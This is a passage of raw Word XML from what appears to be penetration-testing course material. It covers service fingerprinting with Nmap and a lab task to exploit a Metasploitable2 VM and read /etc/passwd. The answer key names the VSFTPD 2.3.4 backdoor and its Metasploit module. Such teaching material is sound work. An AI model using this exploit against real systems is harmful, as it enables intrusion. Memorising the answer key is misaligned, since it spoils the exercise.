          </w:tcPr>
          <w:p w14:paraId="403537BB" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="42"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Flask,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Kibana,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RabbitMQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D34AF" w14:paraId="40F54272" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44C8E363" w14:textId="77777777" w:rsidR="002D34A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22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(if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says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"Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> SSH")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69C83710" w14:textId="77777777" w:rsidR="002D34A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Might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browser-based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shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C02DCE4" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E0E9A0" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336F6DF3" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="3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5"/>
        <w:gridCol w:w="2823"/>
        <w:gridCol w:w="1430"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D34AF" w14:paraId="6C05C61B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="719"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D9E06A" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="42"/>
              <w:ind w:left="1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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="458313E1" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="42"/>
              <w:ind w:left="1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Means...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="509E829E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="42" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="1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Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Accessible?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D34AF" w14:paraId="3D03B560" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="348DEA6D" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="143"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>http 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https</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="436731BD" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph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Web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server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68EBE6D7" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"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2D34AF" w14:paraId="7494DCCC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5251F399" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="143"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Apache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httpd,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nginx,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Microsoft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IIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CFB189D" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000"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Web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server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software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37EC0552" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"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2D34AF" w14:paraId="7D3145CC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="397"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DE77F4A" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="143"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Apache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Tomcat,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Jetty,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JBoss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="050AF30F" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000"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Java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server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="101B2A45" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph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Often</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D34AF" w14:paraId="35B401F8" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="664F8DCE" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="42"/>
              <w:ind w:left="143"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Node.js,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Express,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Flask, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Django</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15000ADB" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="42"/>
              <w:ind w:left="144"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Frameworks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apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DAD2011" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="42"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2D34AF" w14:paraId="234B660A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="719"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55BC601C" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="278" w:lineRule="auto"/>
              <w:ind w:left="143" w:right="113"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>phpMyAdmin,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Webmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>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OpenVAS, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Zabbix, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36BFE3EB" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000"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Known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2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> panels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A978EBA" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"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</w:tbl>
    <w:p w14:paraId="1E9659D6" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0901362B" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Visual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Clues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in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Service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pacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E87D7C8" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:t>From</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>look</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6DC410" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="44"/>
        <w:ind w:left="703"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B6D8F6D" wp14:editId="252406B7">
            <wp:extent cx="84328" cy="84328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328" cy="8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b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"Coyote"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"Tomcat" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Apache Tomcat, usually at 8180 or 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A075A53" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43"/>
        <w:ind w:left="703"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72226435" wp14:editId="2C6B3B44">
            <wp:extent cx="84328" cy="84328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328" cy="8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b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"phpMyAdmin" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>→ DB control panel (often on port 80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37210B0E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43"/>
        <w:ind w:left="703"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28CD7CD7" wp14:editId="6E3B157A">
            <wp:extent cx="84328" cy="84328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328" cy="8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b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"Jenkins" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>→ CI/CD Dashboard (often on 8080)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B1D6F4" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43"/>
        <w:ind w:left="703"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB3CD33" wp14:editId="6BD3FC4F">
            <wp:extent cx="84328" cy="84328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328" cy="8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b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Webmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"Cockpit" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>→ Linux system control panels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06901155" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="002D34AF">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF59051" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="306"/>
        </w:tabs>
        <w:spacing w:before="80" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="640"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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exploit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give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necessary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obtain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contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/passwd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 Metasploitable2 VM. Use any exploit you wish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAE543B" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:left="306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screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>showing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE24F59" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="88"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510AE318" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="587"/>
        </w:tabs>
        <w:ind w:left="587" w:hanging="281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contents of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passwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B700CA" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="587"/>
        </w:tabs>
        <w:ind w:left="587" w:hanging="28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commands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you </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ran</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA5FC87" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="587"/>
        </w:tabs>
        <w:ind w:left="587" w:hanging="281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output of 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commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D5BB42" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="407DA253" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="306" w:right="6831"/>
      </w:pPr>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"[your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">name]" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC931B4" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7784A147" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="306" w:right="3226"/>
      </w:pPr>
      <w:r>
        <w:t>Explain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commands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task. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362C074C" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5220B4AB" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9079"/>
        </w:tabs>
        <w:spacing w:line="381" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="274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5296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E835A5C" wp14:editId="502E5868">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094105</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>530573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4391152" cy="1276858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152" cy="1276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0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit used: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VSFTPD v2.3.4 backdoor on port 21 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(identified by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBFD797" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BEA309" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41814851" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C0202C" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409EFC2B" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E3CE2B3" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D1C823" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="157"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF7E21F" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Module:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
